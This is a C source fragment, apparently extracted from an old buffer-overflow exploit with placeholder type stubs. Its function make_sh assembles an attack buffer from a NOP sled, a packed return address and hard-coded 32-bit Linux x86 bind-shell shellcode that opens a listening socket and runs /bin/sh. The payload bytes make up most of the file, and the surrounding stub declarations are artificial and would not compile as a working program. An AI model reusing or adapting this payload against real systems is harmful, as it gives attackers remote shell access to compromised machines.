
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_long ;
typedef int sh_data_align_4 ;


 int D_M ;
 char NOP_NOP_PSH ;
 int NULL_NULL_PSH ;
 int memset (char*,int ,int) ;
 int strdup (char*) ;
 int strlen (char*) ;

int make_sh(u_long shcode,int l_sz)
{
 int plus_sz_plus=D_M,pk_sz=D_M;
 char shell_code_bind_36864[]={

  0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,
  0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,
  0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,
  0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,
  0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,
  0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,
  0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,
  0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,
  0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,
  0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,
  0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,
  0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,
  0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,
  0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,
  0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,
  0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
 };
 char sh_data_align_4[0x400];

 memset((char *)sh_data_align_4,0x00,sizeof(sh_data_align_4));

 for(pk_sz=D_M;pk_sz<l_sz;pk_sz++)
  sh_data_align_4[pk_sz]=0x90;
 {
  sh_data_align_4[pk_sz++]=(shcode>>0)&0xff;
  sh_data_align_4[pk_sz++]=(shcode>>8)&0xff;
  sh_data_align_4[pk_sz++]=(shcode>>16)&0xff;
  sh_data_align_4[pk_sz++]=(shcode>>24)&0xff;
  sh_data_align_4[pk_sz++]=(0x3e);
 }
 for(plus_sz_plus=D_M;
  plus_sz_plus<sizeof(sh_data_align_4)-
  strlen(sh_data_align_4)-
  strlen(shell_code_bind_36864);
  plus_sz_plus++)
  sh_data_align_4[pk_sz++]=0x90;
 for(plus_sz_plus=D_M;
  plus_sz_plus<strlen(shell_code_bind_36864);
  plus_sz_plus++)
  sh_data_align_4[pk_sz++]=shell_code_bind_36864[plus_sz_plus];
 return strdup(sh_data_align_4);
}
